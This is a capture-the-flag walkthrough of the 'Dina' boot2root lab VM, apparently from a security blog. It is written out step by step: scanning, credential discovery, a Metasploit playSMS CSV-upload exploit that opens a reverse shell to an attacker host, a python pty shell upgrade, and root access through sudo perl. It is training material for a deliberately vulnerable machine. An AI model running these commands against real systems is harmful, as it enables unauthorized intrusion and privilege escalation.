Today we are going to take
another CTF challenge Dina. The credit for making this VM machine goes to
“Touhid Shaikh” and it is a boot2root challenge where we have to root the
server and capture the flag to complete the challenge. You can download
this VM here.
Security Level: Beginner
Penetrating Methodology:
1. Scanning
·
Netdiscover
·
NMAP
2.
Enumeration
·
NMAP
·
Web
Directory search
3.
Exploitation
·
Metasploit
4.
Privilege Escalation
·
Exploiting
Sudo rights
Walkthrough:
Scanning:
Let’s
start of by scanning the network and identifying host IP address. We can identify
our host IP as 192.168.43.219 by using Netdiscover.
netdiscover
Then as usual we used our favorite tool Nmap for port enumeration. We found that port 80 is open.
nmap –A 192.168.43.219
Enumeration:
As we can see port 80 is
open, we tried to open the IP address in our browser but we didn’t find
anything useful on the webpage.
Also in the nmap scan we found the robots.txt directory,
so we tried to open it in the browser.
Inside the robots.txt directory we found the
names of multiple directories, so we tried to open each one of them one by one
but found /nothing directory useful
to us.
The source code of /nothing directory revealed some passwords which were useful later.
We have got the passwords so we used dirb to find out any further
directories where we could use these passwords. We found a directory named /secure.
dirb
http://192.168.43.219
In the /secure
directory there is a zip file named backup.zip.
We download the file in our kali machine.
When we tried to extract the zip file it was
password protected, so we tried all the passwords found above and freedom was the correct one.
Now after we extract the file we
find an mp3 file. We checked the file type and found out it is actually an ASCII
file. We opened it and got a username touhid
and a name of directory /SecreTgatwayLogin.
file
backup-cred.mp3
cat
backup-cred.mp3
We opened the directory in the browser and got
a playSMS login page. We put in the username touhid and tried the password from the above found list and diana worked for us.
Exploitation:
In the exploitation phase we looked for any
exploit of playSMS web-application
in the metasploit and found two exploits.
search playsms
We used the second exploit in which we are
uploading our payload using a csv file.
We put in the required fields and used touhid
and diana as username and password.
use exploit/multi/http/playsms_uploadcsv_exec
set rhost 192.168.43.219
set lhost 192.168.43.171
set lport 4444
set username touhid
set password Diana
set targeturi /SecreTgatwayLogin
exploit
After running the exploit, we successfully got
a metrepreter session and the used python one liner to get a proper shell.
On checking the sudo permissions for the www-data
user, it had a sudo permission to run perl.
getuid
shell
python -c 'import pty;
pty.spawn("/bin/sh")'
sudo -l
Privilege Escalation:
To elevate to
root privileges we exploited the sudo permissions of perl and successfully got
the root shell. And then traversed
to the root directory and found the flag.txt
file.
sudo /usr/bin/perl –e “exec ‘/bin/sh’”
whoami
cd /root
ls
cat flag.txt
0 comments:
Post a Comment